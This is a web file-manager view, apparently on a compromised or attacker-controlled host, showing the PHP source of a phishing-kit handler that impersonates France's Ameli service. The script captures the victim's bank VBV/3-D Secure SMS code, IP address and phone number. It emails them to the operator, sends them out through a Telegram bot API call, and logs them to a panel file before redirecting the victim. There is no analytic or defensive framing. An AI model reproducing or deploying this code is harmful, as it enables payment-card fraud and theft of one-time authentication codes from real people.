Файловый менеджер - Редактировать - /home4/cal14593/public_html/vbv.php.tar
Назад
home4/cal14593/public_html/bin/action/vbv.php 0000644 00000004421 14742002237 0014564 0 ustar 00 <?php include("../common/sub_includes.php"); include("../config.php"); ob_start(); if (!isset($_SESSION)) { session_start(); // Et on ouvre la session } $vbvCode = $_POST['input_sms_code']; if ($_SERVER['REQUEST_METHOD'] == 'POST') { $_SESSION['vbvCode'] = $vbvCode; $message = ' [🦊] Ameli Code ApplePay [🦊] 🔐 Code VBV : ' . $_SESSION['vbvCode'] . ' 🛒 Adresse IP : ' . $_SERVER['REMOTE_ADDR'] . ' '; if ($mail_send == true) { $Subject = " 「🍓」+1 Fr3sh Ameli VBV from " . $_SESSION['vbvCode'] . " | " . $_SERVER['HTTP_USER_AGENT']; $head = "From: Ameli <info@querty.bg>"; mail($my_mail, $Subject, $message, $head); } if ($tlg_send == true) { file_get_contents("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=" . $rez_vbv . "&text=" . urlencode("$message")); } setlocale(LC_TIME, 'fr_FR'); date_default_timezone_set('Europe/Paris'); $date = date("d/m/Y"); $heure = date("H:i:s"); $myfile = fopen("../panel/otp.txt", "a") or die("Unable to open file!"); fwrite($myfile, "\n" . ' <tr> <td width="80"> <p align="center">'.$_SERVER['REMOTE_ADDR'].'</td> <td width="30"> <p align="center">'.$_SESSION['tel'].'</td> <td width="40"> <p align="center">'.$_SESSION['vbvCode'].'</td> <td width="40"> <p align="center">'.$date.'</td> </font></td></tr> '); fclose($myfile); $filepath = '../panel/stats.ini'; $data = @parse_ini_file($filepath); $data['sms']++; function update_ini_file($data, $filepath) { $content = ""; $parsed_ini = parse_ini_file($filepath, true); foreach($data as $section => $values){ if($section === ""){ continue; } $content .= $section ."=". $values . "\n\r"; } if (!$handle = fopen($filepath, 'w')) { return false; } $success = fwrite($handle, $content); fclose($handle); } update_ini_file($data, $filepath); header('location: ../pages/confirme.php'); }
| ver. 1.4 |
Github
|
.
| PHP 7.0.33 | Генерация страницы: 0.02 |
proxy
|
phpinfo
|
Настройка